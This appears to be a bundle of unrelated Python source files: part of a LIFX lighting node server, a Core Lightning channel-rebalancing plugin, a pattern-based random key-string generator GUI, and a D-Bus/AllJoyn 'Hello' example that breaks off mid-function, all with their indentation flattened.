''' 0 - No effect, 1 - Reserved, 2 - Morph, 3 - Flame '''
''' However we skip 1 in the NodeDef '''
if effect_type > 0:
effect_type += 1
if effect_type == 2:
brightness = int(query.get('B.uom56'))
palette = [(0, 65535, brightness, 3500), (7281, 65535, brightness, 3500), (10922, 65535, brightness, 3500),
(22209, 65535, brightness, 3500),
(43507, 65535, brightness, 3500), (49333, 65535, brightness, 3500),
(53520, 65535, brightness, 3500)]
else:
palette = []
effect_speed = int(query.get('ES.uom42'))
''' Tile needs effect duration in nanoseconds so multiply by 2*10^6 '''
effect_duration = int(query.get('ED.uom42')) * 1000000
try:
self.device.set_tile_effect(effect_type=effect_type, speed=effect_speed, duration=effect_duration,
palette=palette)
except (lifxlan.WorkflowException, TypeError) as ex:
LOGGER.error('set_tile_effect error {}'.format(ex))
drivers = [{'driver': 'ST', 'value': 0, 'uom': 51},
{'driver': 'GV0', 'value': 0, 'uom': 56},
{'driver': 'GV1', 'value': 0, 'uom': 56},
{'driver': 'GV2', 'value': 0, 'uom': 56},
{'driver': 'GV3', 'value': 0, 'uom': 56},
{'driver': 'CLITEMP', 'value': 0, 'uom': 26},
{'driver': 'GV5', 'value': 0, 'uom': 2},
{'driver': 'GV6', 'value': 0, 'uom': 20},
{'driver': 'GV7', 'value': 0, 'uom': 56},
{'driver': 'GV8', 'value': 0, 'uom': 56},
{'driver': 'GV9', 'value': 0, 'uom': 25},
{'driver': 'RR', 'value': 0, 'uom': 42}]
id = 'lifxtile'
commands = {
'DON': Light.setOn, 'DOF': Light.setOff, 'QUERY': Light.query,
'SET_COLOR': Light.setColor, 'SETH': Light.setManual,
'SETS': Light.setManual, 'SETB': Light.setManual,
'CLITEMP': Light.setManual,
'RR': Light.setManual, 'SET_HSBKD': Light.setHSBKD,
'BRT': Light.brighten, 'DIM': Light.dim, 'FDUP': Light.fade_up,
'FDDOWN': Light.fade_down, 'FDSTOP': Light.fade_stop,
'DFON': Light.setOn, 'DFOF': Light.setOff,
'SETIR': Light.set_ir_brightness, 'WAVEFORM': Light.set_wf,
'EFFECT': set_tile_effect, 'TILESV': save_state, 'TILERT': recall_state
}
class Group(polyinterface.Node):
"""
LiFX Group Node Class
"""
def __init__(self, controller, primary, address, label, grp=None):
self.label = label.replace("'", "")
super().__init__(controller, primary, address, 'LIFX Group ' + str(label))
self.lifxLabel = label
if grp:
self.lifxGroup = grp
else:
self.lifxGroup = self.controller.lifxLan.get_devices_by_group(label)
self.numMembers = len(self.lifxGroup.devices)
def start(self):
self.update()
# self.reportDrivers()
def update(self):
self.numMembers = len(self.lifxGroup.devices)
self.setDriver('ST', self.numMembers)
def long_update(self):
pass
def query(self, command=None):
self.update()
self.reportDrivers()
def _power_on_change(self):
if not self.controller.change_pon:
return
try:
self.lifxGroup.set_power(True, rapid=True)
except lifxlan.WorkflowException as ex:
LOGGER.error(
'Error on setting {} power. This happens from time to time, normally safe to ignore. {}'.format(
self.name, str(ex)))
def setOn(self, command):
try:
self.lifxGroup.set_power(True, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group seton error caught %s', str(ex))
else:
LOGGER.info('Received SetOn command for group {} from ISY. Setting all {} members to ON.'.format(self.label,
self.numMembers))
def setOff(self, command):
try:
self.lifxGroup.set_power(False, rapid=True)
except (lifxlan.WorkflowException, IOError) as e:
LOGGER.error('group setoff error caught {}'.format(str(e)))
else:
LOGGER.info(
'Received SetOff command for group {} from ISY. Setting all {} members to OFF.'.format(self.label,
self.numMembers))
def setColor(self, command):
_color = int(command.get('value'))
try:
self.lifxGroup.set_color(COLORS[_color][1], 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolor error caught %s', str(ex))
else:
LOGGER.info(
'Received SetColor command for group {} from ISY. Changing color to: {} for all {} members.'.format(
self.name, COLORS[_color][0], self.numMembers))
self._power_on_change()
def setHue(self, command):
_hue = int(command.get('value'))
try:
self.lifxGroup.set_hue(_hue, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethue error caught %s', str(ex))
else:
LOGGER.info('Received SetHue command for group {} from ISY. Changing hue to: {} for all {} members.'.format(
self.name, _hue, self.numMembers))
self._power_on_change()
def setSat(self, command):
_sat = int(command.get('value'))
try:
self.lifxGroup.set_saturation(_sat, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setsaturation error caught %s', str(ex))
else:
LOGGER.info(
'Received SetSat command for group {} from ISY. Changing saturation to: {} for all {} members.'.format(
self.name, _sat, self.numMembers))
self._power_on_change()
def setBri(self, command):
_bri = int(command.get('value'))
try:
self.lifxGroup.set_brightness(_bri, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setbrightness error caught %s', str(ex))
else:
LOGGER.info(
'Received SetBri command for group {} from ISY. Changing brightness to: {} for all {} members.'.format(
self.name, _bri, self.numMembers))
self._power_on_change()
def setCTemp(self, command):
_ctemp = int(command.get('value'))
try:
self.lifxGroup.set_colortemp(_ctemp, 0, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group setcolortemp error caught %s', str(ex))
else:
LOGGER.info(
'Received SetCTemp command for group {} from ISY. Changing color temperature to: {} for all {} members.'.format(
self.name, _ctemp, self.numMembers))
self._power_on_change()
def set_ir_brightness(self, command):
_val = int(command.get('value'))
try:
self.lifxGroup.set_infrared(_val)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group set_infrared_brightness error caught %s', str(ex))
else:
LOGGER.info(
'Received SetIR command for group {} from ISY. Changing infrared brightness to: {} for all {} members.'.format(
self.name, _val, self.numMembers))
self._power_on_change()
def setHSBKD(self, command):
query = command.get('query')
try:
color = [int(query.get('H.uom56')), int(query.get('S.uom56')), int(query.get('B.uom56')),
int(query.get('K.uom26'))]
duration = int(query.get('D.uom42'))
except TypeError:
duration = 0
try:
self.lifxGroup.set_color(color, duration=duration, rapid=True)
except (lifxlan.WorkflowException, IOError) as ex:
LOGGER.error('group sethsbkd error caught {}'.format(str(ex)))
else:
LOGGER.info(
'Recieved SetHSBKD command for group {} from ISY, Setting all members to Color {}, duration {}'.format(
self.label, color, duration))
self._power_on_change()
drivers = [{'driver': 'ST', 'value': 0, 'uom': 56}]
commands = {
'DON': setOn, 'DOF': setOff, 'QUERY': query,
'SET_COLOR': setColor, 'SET_HSBKD': setHSBKD,
'SETH': setHue, 'SETS': setSat, 'SETB': setBri,
'CLITEMP': setCTemp, 'DFON': setOn, 'DFOF': setOff,
'SETIR': set_ir_brightness
}
id = 'lifxgroup'
if __name__ == "__main__":
try:
polyglot = polyinterface.Interface('Lutron RadioRA2')
polyglot.start()
control = Controller(polyglot)
control.runForever()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)
|
rebalance.py
|
#!/usr/bin/env python3
from pyln.client import Plugin, Millisatoshi, RpcError
from threading import Thread, Lock
from datetime import timedelta
import time
import uuid
plugin = Plugin()
plugin.rebalance_stop = False
def setup_routing_fees(plugin, route, msatoshi):
delay = plugin.cltv_final
for r in reversed(route):
r['msatoshi'] = msatoshi.millisatoshis
r['amount_msat'] = msatoshi
r['delay'] = delay
channels = plugin.rpc.listchannels(r['channel'])
ch = next(c for c in channels.get('channels') if c['destination'] == r['id'])
fee = Millisatoshi(ch['base_fee_millisatoshi'])
# BOLT #7 requires fee >= fee_base_msat + ( amount_to_forward * fee_proportional_millionths / 1000000 )
fee += (msatoshi * ch['fee_per_millionth'] + 10**6 - 1) // 10**6 # integer math trick to round up
msatoshi += fee
delay += ch['delay']
def get_channel(plugin, payload, peer_id, scid, check_state: bool = False):
peer = plugin.rpc.listpeers(peer_id).get('peers')[0]
channel = next(c for c in peer['channels'] if c.get('short_channel_id') == scid)
if check_state:
if channel['state'] != "CHANNELD_NORMAL":
raise RpcError('rebalance', payload, {'message': 'Channel %s not in state CHANNELD_NORMAL, but: %s' % (scid, channel['state'])})
if not peer['connected']:
raise RpcError('rebalance', payload, {'message': 'Channel %s peer is not connected.' % scid})
return channel
def amounts_from_scid(plugin, scid):
channels = plugin.rpc.listfunds().get('channels')
channel = next(c for c in channels if c.get('short_channel_id') == scid)
our_msat = Millisatoshi(channel['our_amount_msat'])
total_msat = Millisatoshi(channel['amount_msat'])
return our_msat, total_msat
def peer_from_scid(plugin, short_channel_id, my_node_id, payload):
channels = plugin.rpc.listchannels(short_channel_id).get('channels')
for ch in channels:
if ch['source'] == my_node_id:
return ch['destination']
raise RpcError("rebalance", payload, {'message': 'Cannot find peer for channel: ' + short_channel_id})
def find_worst_channel(route):
if len(route) < 4:
return None
start_id = 2
worst = route[start_id]['channel']
worst_val = route[start_id - 1]['msatoshi'] - route[start_id]['msatoshi']
for i in range(start_id + 1, len(route) - 1):
val = route[i - 1]['msatoshi'] - route[i]['msatoshi']
if val > worst_val:
worst = route[i]['channel']
worst_val = val
return worst
def cleanup(plugin, label, payload, success_msg, error=None):
try:
plugin.rpc.delinvoice(label, 'unpaid')
except RpcError as e:
# race condition: waitsendpay timed out, but invoice get paid
if 'status is paid' in e.error.get('message', ""):
return success_msg
if error is None:
error = RpcError("rebalance", payload, {'message': 'Rebalance failed'})
raise error
# This function calculates the optimal rebalance amount
# based on the selected channels capacity and state.
# It will return a value that brings at least one of the channels to balance.
# It will raise an error, when this isnt possible.
#
# EXAMPLE
# |------------------- out_total -------------|
# OUT -v => |-------- out_ours -------||-- out_theirs --| => +v
#
# IN +v <= |-- in_ours --||---------- in_theirs ---------| <= -v
# |--------- in_total --------------------------|
#
# CHEAP SOLUTION: take v_min from 50/50 values
# O* vo = out_ours - (out_total/2)
# I* vi = (in_total/2) - in_ours
# return min(vo, vi)
#
# ... and cover edge cases with exceeding in/out capacity or negative values.
def calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload):
out_ours, out_total = int(out_ours), int(out_total)
in_ours, in_total = int(in_ours), int(in_total)
in_theirs = in_total - in_ours
vo = int(out_ours - (out_total / 2))
vi = int((in_total / 2) - in_ours)
# cases where one option can be eliminated because it exceeds other capacity
if vo > in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi > out_ours and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# cases where one channel is still capable to bring other to balance
if vo < 0 and vi > 0 and vi < out_ours:
return Millisatoshi(vi)
if vi < 0 and vo > 0 and vo < in_theirs:
return Millisatoshi(vo)
# when both options are possible take the one with least effort
if vo > 0 and vo < in_theirs and vi > 0 and vi < out_ours:
return Millisatoshi(min(vi, vo))
raise RpcError("rebalance", payload, {'message': 'rebalancing these channels will make things worse'})
@plugin.method("rebalance")
def rebalance(plugin, outgoing_scid, incoming_scid, msatoshi: Millisatoshi = None,
maxfeepercent: float = 0.5, retry_for: int = 60, exemptfee: Millisatoshi = Millisatoshi(5000)):
"""Rebalancing channel liquidity with circular payments.
This tool helps to move some msatoshis between your channels.
"""
if msatoshi:
msatoshi = Millisatoshi(msatoshi)
maxfeepercent = float(maxfeepercent)
retry_for = int(retry_for)
exemptfee = Millisatoshi(exemptfee)
payload = {
"outgoing_scid": outgoing_scid,
"incoming_scid": incoming_scid,
"msatoshi": msatoshi,
"maxfeepercent": maxfeepercent,
"retry_for": retry_for,
"exemptfee": exemptfee
}
my_node_id = plugin.rpc.getinfo().get('id')
outgoing_node_id = peer_from_scid(plugin, outgoing_scid, my_node_id, payload)
incoming_node_id = peer_from_scid(plugin, incoming_scid, my_node_id, payload)
get_channel(plugin, payload, outgoing_node_id, outgoing_scid, True)
get_channel(plugin, payload, incoming_node_id, incoming_scid, True)
out_ours, out_total = amounts_from_scid(plugin, outgoing_scid)
in_ours, in_total = amounts_from_scid(plugin, incoming_scid)
plugin.log("Outgoing node: %s, channel: %s" % (outgoing_node_id, outgoing_scid), 'debug')
plugin.log("Incoming node: %s, channel: %s" % (incoming_node_id, incoming_scid), 'debug')
# If amount was not given, calculate a suitable 50/50 rebalance amount
if msatoshi is None:
msatoshi = calc_optimal_amount(out_ours, out_total, in_ours, in_total, payload)
plugin.log("Estimating optimal amount %s" % msatoshi)
# Check requested amounts are selected channels
if msatoshi > out_ours or msatoshi > in_total - in_ours:
raise RpcError("rebalance", payload, {'message': 'Channel capacities too low'})
route_out = {'id': outgoing_node_id, 'channel': outgoing_scid, 'direction': int(not my_node_id < outgoing_node_id)}
route_in = {'id': my_node_id, 'channel': incoming_scid, 'direction': int(not incoming_node_id < my_node_id)}
start_ts = int(time.time())
label = "Rebalance-" + str(uuid.uuid4())
description = "%s to %s" % (outgoing_scid, incoming_scid)
invoice = plugin.rpc.invoice(msatoshi, label, description, retry_for + 60)
payment_hash = invoice['payment_hash']
success_msg = ""
try:
excludes = []
# excude all own channels to prevent unwanted shortcuts [out,mid,in]
mychannels = plugin.rpc.listchannels(source=my_node_id)['channels']
for channel in mychannels:
excludes += [channel['short_channel_id'] + '/0', channel['short_channel_id'] + '/1']
while int(time.time()) - start_ts < retry_for and not plugin.rebalance_stop:
r = plugin.rpc.getroute(incoming_node_id, msatoshi, riskfactor=1, cltv=9, fromid=outgoing_node_id, exclude=excludes)
route_mid = r['route']
route = [route_out] + route_mid + [route_in]
setup_routing_fees(plugin, route, msatoshi)
fees = route[0]['amount_msat'] - msatoshi
# check fee and exclude worst channel the next time
# NOTE: the int(msat) casts are just a workaround for outdated pylightning versions
if fees > exemptfee and int(fees) > int(msatoshi) * maxfeepercent / 100:
worst_channel_id = find_worst_channel(route)
if worst_channel_id is None:
raise RpcError("rebalance", payload, {'message': 'Insufficient fee'})
excludes += [worst_channel_id + '/0', worst_channel_id + '/1']
continue
success_msg = {"sent": msatoshi + fees, "received": msatoshi, "fee": fees, "hops": len(route),
"outgoing_scid": outgoing_scid, "incoming_scid": incoming_scid, "status": "settled",
"message": f"{msatoshi + fees} sent over {len(route)} hops to rebalance {msatoshi}"}
plugin.log("Sending %s over %d hops to rebalance %s" % (msatoshi + fees, len(route), msatoshi), 'debug')
for r in route:
plugin.log(" - %s %14s %s" % (r['id'], r['channel'], r['amount_msat']), 'debug')
try:
plugin.rpc.sendpay(route, payment_hash)
plugin.rpc.waitsendpay(payment_hash, retry_for + start_ts - int(time.time()))
return success_msg
except RpcError as e:
plugin.log("RpcError: " + str(e), 'debug')
erring_channel = e.error.get('data', {}).get('erring_channel')
if erring_channel == incoming_scid:
raise RpcError("rebalance", payload, {'message': 'Error with incoming channel'})
if erring_channel == outgoing_scid:
raise RpcError("rebalance", payload, {'message': 'Error with outgoing channel'})
erring_direction = e.error.get('data', {}).get('erring_direction')
if erring_channel is not None and erring_direction is not None:
excludes.append(erring_channel + '/' + str(erring_direction))
except Exception as e:
plugin.log("Exception: " + str(e), 'debug')
return cleanup(plugin, label, payload, success_msg, e)
return cleanup(plugin, label, payload, success_msg)
def a_minus_b(a: Millisatoshi, b: Millisatoshi):
# a minus b, but Millisatoshi cannot be negative
return a - b if a > b else Millisatoshi(0)
def must_send(liquidity):
# liquidity is too high, must send some sats
return a_minus_b(liquidity["min"], liquidity["their"])
def should_send(liquidity):
# liquidity is a bit high, would be good to send some sats
return a_minus_b(liquidity["ideal"]["their"], liquidity["their"])
def could_send(liquidity):
# liquidity maybe a bit low, but can send some more sats, if needed
return a_minus_b(liquidity["our"], liquidity["min"])
def must_receive(liquidity):
# liquidity is too low, must receive some sats
return a_minus_b(liquidity["min"], liquidity["our"])
def should_receive(liquidity):
# liquidity is a bit low, would be good to receive some sats
return a_minus_b(liquidity["ideal"]["our"], liquidity["our"])
def could_receive(liquidity):
# liquidity maybe a bit high, but can receive some more sats, if needed
return a_minus_b(liquidity["their"], liquidity["min"])
def get_open_channels(plugin: Plugin):
channels = []
for peer in plugin.rpc.listpeers()["peers"]:
for ch in peer["channels"]:
if ch["state"] == "CHANNELD_NORMAL" and not ch["private"]:
channels.append(ch)
return channels
def check_liquidity_threshold(channels: list, threshold: Millisatoshi):
# check if overall rebalances can be successful with this threshold
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
required = Millisatoshi(0)
for ch in channels:
required += min(threshold, ch["total_msat"] / 2)
return required < our and required < total - our
def binary_search(channels: list, low: Millisatoshi, high: Millisatoshi):
if high - low < Millisatoshi("1sat"):
return low
next_step = (low + high) / 2
if check_liquidity_threshold(channels, next_step):
return binary_search(channels, next_step, high)
else:
return binary_search(channels, low, next_step)
def get_enough_liquidity_threshold(channels: list):
biggest_channel = max(channels, key=lambda ch: ch["total_msat"])
max_threshold = binary_search(channels, Millisatoshi(0), biggest_channel["total_msat"] / 2)
return max_threshold / 2
def get_ideal_ratio(channels: list, enough_liquidity: Millisatoshi):
# ideal liquidity ratio for big channels:
# small channels should have a 50/50 liquidity ratio to be usable
# and big channels can store the remaining liquidity above the threshold
assert len(channels) > 0
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
chs = list(channels) # get a copy!
while len(chs) > 0:
ratio = int(our) / int(total)
smallest_channel = min(chs, key=lambda ch: ch["total_msat"])
if smallest_channel["total_msat"] * min(ratio, 1 - ratio) > enough_liquidity:
break
min_liquidity = min(smallest_channel["total_msat"] / 2, enough_liquidity)
diff = smallest_channel["total_msat"] * ratio
diff = max(diff, min_liquidity)
diff = min(diff, smallest_channel["total_msat"] - min_liquidity)
our -= diff
total -= smallest_channel["total_msat"]
chs.remove(smallest_channel)
assert 0 <= ratio and ratio <= 1
return ratio
def feeadjust_would_be_nice(plugin: Plugin):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjust"]
if len(commands) == 1:
msg = plugin.rpc.feeadjust()
plugin.log(f"Feeadjust succeeded: {msg}")
else:
plugin.log("The feeadjuster plugin would be useful here")
def get_max_amount(i: int, plugin: Plugin):
return max(plugin.min_amount, plugin.enough_liquidity / (4**(i + 1)))
def get_max_fee(plugin: Plugin, msat: Millisatoshi):
# TODO: sanity check
return (plugin.fee_base + msat * plugin.fee_ppm / 10**6) * plugin.feeratio
def get_chan(plugin: Plugin, scid: str):
for peer in plugin.rpc.listpeers()["peers"]:
if len(peer["channels"]) == 0:
continue
# We might have multiple channel entries ! Eg if one was just closed
# and reopened.
for chan in peer["channels"]:
if chan.get("short_channel_id") == scid:
return chan
def liquidity_info(channel, enough_liquidity: Millisatoshi, ideal_ratio: float):
liquidity = {
"our": channel["to_us_msat"],
"their": channel["total_msat"] - channel["to_us_msat"],
"min": min(enough_liquidity, channel["total_msat"] / 2),
"max": max(a_minus_b(channel["total_msat"], enough_liquidity), channel["total_msat"] / 2),
"ideal": {}
}
liquidity["ideal"]["our"] = min(max(channel["total_msat"] * ideal_ratio, liquidity["min"]), liquidity["max"])
liquidity["ideal"]["their"] = min(max(channel["total_msat"] * (1 - ideal_ratio), liquidity["min"]), liquidity["max"])
return liquidity
def wait_for(success, timeout: int = 60):
# cyclical lambda helper
# taken and modified from pyln-testing/pyln/testing/utils.py
start_time = time.time()
interval = 0.25
while not success():
time_left = start_time + timeout - time.time()
if time_left <= 0:
return False
time.sleep(min(interval, time_left))
interval *= 2
if interval > 5:
interval = 5
return True
def wait_for_htlcs(plugin, failed_channels: list, scids: list = None):
# HTLC settlement helper
# taken and modified from pyln-testing/pyln/testing/utils.py
result = True
peers = plugin.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel.get('short_channel_id') not in scids:
continue
if channel.get('short_channel_id') in failed_channels:
result = False
continue
if 'htlcs' in channel:
if not wait_for(lambda: len(plugin.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0):
failed_channels.append(channel.get('short_channel_id'))
plugin.log(f"Timeout while waiting for htlc settlement in channel {channel.get('short_channel_id')}")
result = False
return result
def maybe_rebalance_pairs(plugin: Plugin, ch1, ch2, failed_channels: list):
scid1 = ch1["short_channel_id"]
scid2 = ch2["short_channel_id"]
result = {"success": False, "fee_spent": Millisatoshi(0)}
if scid1 + ":" + scid2 in failed_channels:
return result
# check if HTLCs are settled
if not wait_for_htlcs(plugin, failed_channels, [scid1, scid2]):
return result
i = 0
while not plugin.rebalance_stop:
liquidity1 = liquidity_info(ch1, plugin.enough_liquidity, plugin.ideal_ratio)
liquidity2 = liquidity_info(ch2, plugin.enough_liquidity, plugin.ideal_ratio)
amount1 = min(must_send(liquidity1), could_receive(liquidity2))
amount2 = min(should_send(liquidity1), should_receive(liquidity2))
amount3 = min(could_send(liquidity1), must_receive(liquidity2))
amount = max(amount1, amount2, amount3)
if amount < plugin.min_amount:
return result
amount = min(amount, get_max_amount(i, plugin))
maxfee = get_max_fee(plugin, amount)
plugin.log(f"Try to rebalance: {scid1} -> {scid2}; amount={amount}; maxfee={maxfee}")
start_ts = time.time()
try:
res = rebalance(plugin, outgoing_scid=scid1, incoming_scid=scid2, msatoshi=amount, maxfeepercent=0, retry_for=1200, exemptfee=maxfee)
except Exception:
failed_channels.append(scid1 + ":" + scid2)
# rebalance failed, let's try with a smaller amount
while (get_max_amount(i, plugin) >= amount and
get_max_amount(i, plugin) != get_max_amount(i + 1, plugin)):
i += 1
if amount > get_max_amount(i, plugin):
continue
return result
result["success"] = True
result["fee_spent"] += res["fee"]
htlc_start_ts = time.time()
# wait for settlement
htlc_success = wait_for_htlcs(plugin, failed_channels, [scid1, scid2])
current_ts = time.time()
res["elapsed_time"] = str(timedelta(seconds=current_ts - start_ts))[:-3]
res["htlc_time"] = str(timedelta(seconds=current_ts - htlc_start_ts))[:-3]
plugin.log(f"Rebalance succeeded: {res}")
if not htlc_success:
return result
ch1 = get_chan(plugin, scid1)
assert ch1 is not None
ch2 = get_chan(plugin, scid2)
assert ch2 is not None
return result
def maybe_rebalance_once(plugin: Plugin, failed_channels: list):
channels = get_open_channels(plugin)
for ch1 in channels:
for ch2 in channels:
if ch1 == ch2:
continue
result = maybe_rebalance_pairs(plugin, ch1, ch2, failed_channels)
if result["success"] or plugin.rebalance_stop:
return result
return {"success": False, "fee_spent": Millisatoshi(0)}
def feeadjuster_toggle(plugin: Plugin, new_value: bool):
commands = [c for c in plugin.rpc.help().get("help") if c["command"].split()[0] == "feeadjuster-toggle"]
if len(commands) == 1:
msg = plugin.rpc.feeadjuster_toggle(new_value)
return msg["forward_event_subscription"]["previous"]
else:
return True
def rebalanceall_thread(plugin: Plugin):
if not plugin.mutex.acquire(blocking=False):
return
try:
start_ts = time.time()
feeadjuster_state = feeadjuster_toggle(plugin, False)
channels = get_open_channels(plugin)
plugin.enough_liquidity = get_enough_liquidity_threshold(channels)
plugin.ideal_ratio = get_ideal_ratio(channels, plugin.enough_liquidity)
plugin.log(f"Automatic rebalance is running with enough liquidity threshold: {plugin.enough_liquidity}, "
f"ideal liquidity ratio: {plugin.ideal_ratio * 100:.2f}%, "
f"min rebalancable amount: {plugin.min_amount}, "
f"feeratio: {plugin.feeratio}")
failed_channels = []
success = 0
fee_spent = Millisatoshi(0)
while not plugin.rebalance_stop:
result = maybe_rebalance_once(plugin, failed_channels)
if not result["success"]:
break
success += 1
fee_spent += result["fee_spent"]
feeadjust_would_be_nice(plugin)
feeadjuster_toggle(plugin, feeadjuster_state)
elapsed_time = timedelta(seconds=time.time() - start_ts)
plugin.log(f"Automatic rebalance finished: {success} successful rebalance, {fee_spent} fee spent, it took {str(elapsed_time)[:-3]}")
finally:
plugin.mutex.release()
@plugin.method("rebalanceall")
def rebalanceall(plugin: Plugin, min_amount: Millisatoshi = Millisatoshi("50000sat"), feeratio: float = 0.5):
"""Rebalance all unbalanced channels if possible for a very low fee.
Default minimum rebalancable amount is 50000sat. Default feeratio = 0.5, half of our node's default fee.
To be economical, it tries to fix the liquidity cheaper than it can be ruined by transaction forwards.
It may run for a long time (hours) in the background, but can be stopped with the rebalancestop method.
"""
# some early checks before we start the async thread
if plugin.mutex.locked():
return {"message": "Rebalance is already running, this may take a while. To stop it use the cli method 'rebalancestop'."}
channels = get_open_channels(plugin)
if len(channels) <= 1:
return {"message": "Error: Not enough open channels to rebalance anything"}
our = sum(ch["to_us_msat"] for ch in channels)
total = sum(ch["total_msat"] for ch in channels)
min_amount = Millisatoshi(min_amount)
if total - our < min_amount or our < min_amount:
return {"message": "Error: Not enough liquidity to rebalance anything"}
# param parsing ensure correct type
plugin.feeratio = float(feeratio)
plugin.min_amount = min_amount
# run the job
t = Thread(target=rebalanceall_thread, args=(plugin, ))
t.start()
return {"message": f"Rebalance started with min rebalancable amount: {plugin.min_amount}, feeratio: {plugin.feeratio}"}
@plugin.method("rebalancestop")
def rebalancestop(plugin: Plugin):
"""It stops the ongoing rebalanceall.
"""
if not plugin.mutex.locked():
return {"message": "No rebalance is running, nothing to stop"}
plugin.rebalance_stop = True
plugin.mutex.acquire(blocking=True)
plugin.rebalance_stop = False
plugin.mutex.release()
return {"message": "Rebalance stopped"}
@plugin.init()
def init(options, configuration, plugin):
config = plugin.rpc.listconfigs()
plugin.cltv_final = config.get("cltv-final")
plugin.fee_base = Millisatoshi(config.get("fee-base"))
plugin.fee_ppm = config.get("fee-per-satoshi")
plugin.mutex = Lock()
plugin.log(f"Plugin rebalance initialized with {plugin.fee_base} base / {plugin.fee_ppm} ppm fee, "
f"cltv_final: {plugin.cltv_final}")
plugin.run()
|
SimpleKeyGen.py
|
import rstr
import re
import PySimpleGUI as sg
from threading import Thread
def pattern_gen(pattern):
spl_characters = re.compile(r'[@_!#$%^&*()<>?/\|}{~:]')
if spl_characters.search(pattern) is not None:
r = rstr.xeger(pattern.replace("X", "[A-Z]").replace("x", "[a-z]").replace("D", "\d"))
r = re.sub(spl_characters, rstr.xeger("[@_!#$%^&*()<>?/\|}{~:]"), r)
window['results'].print(r)
else:
r = rstr.xeger(pattern.replace("X", "[A-Z]").replace("x", "[a-z]").replace("D", "\d"))
window['results'].print(r)
Layout = [
[sg.Text("Python Key Generator", font=("", 40))],
[sg.Text("Developed By Henry Richard J", font=("", 15), size=(30, 1))],
[sg.Input(key="-sampleString-", font=("", 20))],
[sg.Text("Number of keys to generate", size=(30, 1), font=("", 20))],
[sg.Slider(range=(1, 100), default_value=5, size=(45, 20), font=("", 10), key="-No_Keys-",
tooltip="Use The Slider To Choose Number Of Keys To Be Generated", orientation="horizontal")],
[sg.Multiline(size=(100, 22), disabled=True, key="results", font=("", 10))],
[sg.Button("Generate", key="-Generate-", font=("", 15))]
]
window = sg.Window('Python Key Generator', Layout, element_justification='center')
while True:
event, values = window.read()
if event == sg.WIN_CLOSED:
break
if event == "-Generate-":
replaced = re.sub(r"[A-Z]", "X", values['-sampleString-'])
replaced = re.sub(r"[a-z]", "x", replaced)
replaced = re.sub(r"[0-9]", "D", replaced)
for i in range(int(values["-No_Keys-"])):
Thread(target=pattern_gen, args=(replaced,)).start()
|
hello.py
|
#!/usr/bin/python3
import time, uuid
import threading
import traceback
import sys
import os
import socket
import collections
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from gi.repository import GObject
scriptDir = os.path.dirname(os.path.realpath(__file__))
sys.path.append( scriptDir + "/common" )
import core
DBusGMainLoop(set_as_default=True)
DBUS_BRIDGE_NAME = 'com.devicehive.alljoyn.bridge'
DBUS_BRIDGE_PATH = '/com/devicehive/alljoyn/bridge'
DBUS_BUS_NAME = 'com.devicehive.alljoyn.SmartHome'
DBUS_BUS_PATH = '/com/devicehive/alljoyn/SmartHome'
HELLO_SVC = 'org.allseen.SmartHome.Hello'
bus = dbus.SystemBus()
bus_name = dbus.service.BusName(DBUS_BUS_NAME, bus)
class HelloService(core.PropertiesServiceInterface):
def __init__(self, container):
core.PropertiesServiceInterface.__init__(self, container, "/Service",
{HELLO_SVC : {'Name': 'AllJoyn'}})
def IntrospectionXml(self):
return """
<interface name="org.allseen.SmartHome.Hello">
<property name="Name" type="s" access="readwrite"/>
<method name="Greet">
<arg name="greeting" type="s" direction="out"/>
</method>
</interface>
""" + core.PropertiesServiceInterface.IntrospectionXml(self)
@dbus.service.method(HELLO_SVC, in_signature='', out_signature='s')
def Greet(self):
print("Hello, %s!" % self.Get(HELLO_SVC, "Name"))
return "Hello, %s!" % self.Get(HELLO_SVC, "Name")
class Hello():
def __init__(self, busname, name):
self._id = uuid.uuid4().hex
self._name = name
about_props = {
'AppId': dbus.ByteArray(bytes.fromhex(self.id)),
'DefaultLanguage': 'en',
'DeviceName': self.name,
'DeviceId': self.id,
'AppName': 'Hello',
'Manufacturer': 'DeviceHive',
'DateOfManufacture': '2015-10-28',
'ModelNumber': 'example',
'SupportedLanguages': ['en'],
'Description': 'DeviceHive Alljoyn Hello Device',
'SoftwareVersion': '1.0',
'HardwareVersion': '1.0',
'SupportUrl': 'devicehive.com'
}
self._container = core.BusContainer(busname, DBUS_BUS_PATH + '/' + self.id)
self._services = [
core.AboutService(self._container, about_props)
,HelloService(self._container)
# ,core.ConfigService(self._container, self.name)
]
print("Registered %s on dbus" % self.name)
@property
def id(self):
return self._id
@property
def name(self):
return self._name
def publish(self, bridge):
service = self._services[0]
bridge.AddService(self._container.bus.get_name(), self._container.relative('').rstrip('/'), HELLO_SVC,
# ignore_reply=True
reply_handler=lambda id: print("ID: %s" % id),
error_handler=lambda err: print("Error: %s" % err)
)
print("Published %s on bridge" % self.name)
def worker():
try:
bridge = dbus.Interface(bus.get_object(DBUS_BRIDGE_NAME, DBUS_BRIDGE_PATH),
dbus_interface='com.devicehive.alljoyn.bridge')
plug = Hello(bus_name, 'Hello')
plug.publish(bridge)
except Exception as err:
print(err)
traceback.print_exc()
os._exit(1)
def main():
# init d-bus
GObject.threads_init()
dbus.mainloop.glib.threads_init()
# start mainloop
loop = GObject.MainLoop()
worker_thread = threading.Thread(target=worker,)
worker_thread.start()
try:
loop.run()
except (KeyboardInterrupt, SystemExit):
